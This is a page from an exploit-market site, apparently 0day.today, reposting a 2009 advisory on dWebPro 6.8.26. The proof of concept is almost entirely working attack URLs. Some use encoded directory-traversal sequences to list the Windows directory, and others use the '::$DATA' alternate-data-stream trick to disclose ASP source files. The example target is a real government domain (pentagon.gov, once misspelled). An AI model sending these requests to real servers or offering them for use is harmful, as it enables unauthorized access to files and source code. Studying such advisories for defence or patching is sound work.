[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

dWebPro 6.8.26 (DT/FD) Multiple Remote Vulnerabilities

Author
Alfons Luja
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-9433
Category
remote exploits
Date add
26-04-2009
Platform
windows
======================================================
dWebPro 6.8.26 (DT/FD) Multiple Remote Vulnerabilities
======================================================



############################################
       dWebPro v 6.8.26
============================================
   Remote Directory Tarvelsal  && 
   Remote File Disclosure p0c's
============================================
   Autor : Alfons Luja
   Tested on Win32 xp home 
############################################

   poc 1 Directory Travelsal : we can list directory
   
   http://www.penatgon.gov:8080/..%5C/www/..%5C/www/..%5C/..%5C/..%5C/WINDOWS/
   http://www.pentagon.gov:8080/..%2f..%2f..%2fWINDOWS%2f

   poc 2 File Disclosure : we can disclosure any file in a DOCUMENT_ROOT directory 
         by using Alternative Data Streams
   
   http://www.pentagon.gov:8080/..\/www/500-100-js.asp::$DATA
   http://www.pentagon.gov:8080/demos/aspclassic/asp_registry.asp::$DATA

+++++++++++++++++++++++++++++++++++++++++++++




#  0day.today [2024-12-24]  #